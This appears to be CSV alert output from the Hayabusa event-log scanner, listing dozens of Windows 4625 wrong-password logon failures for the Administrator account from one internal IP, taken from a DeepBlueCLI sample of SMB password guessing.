2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG1Bxm0lt3vwoO5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Kf5AaQX7KOVAIAN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW9nBirBTHIXIrfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9qKcDhfcf2kMk00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9NgStzf2xQ4P7q0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9mCrjQykX06IcMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7S0QccvEhetekdDP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n1OnibuatFHwDeLz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8u26bKzFOw12m0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WEEtOj6BOkI7MPY1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiCpuqll36DojD3e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9zjo9ZsSVLZcrsr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KKDD0O5flEsIEDRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20
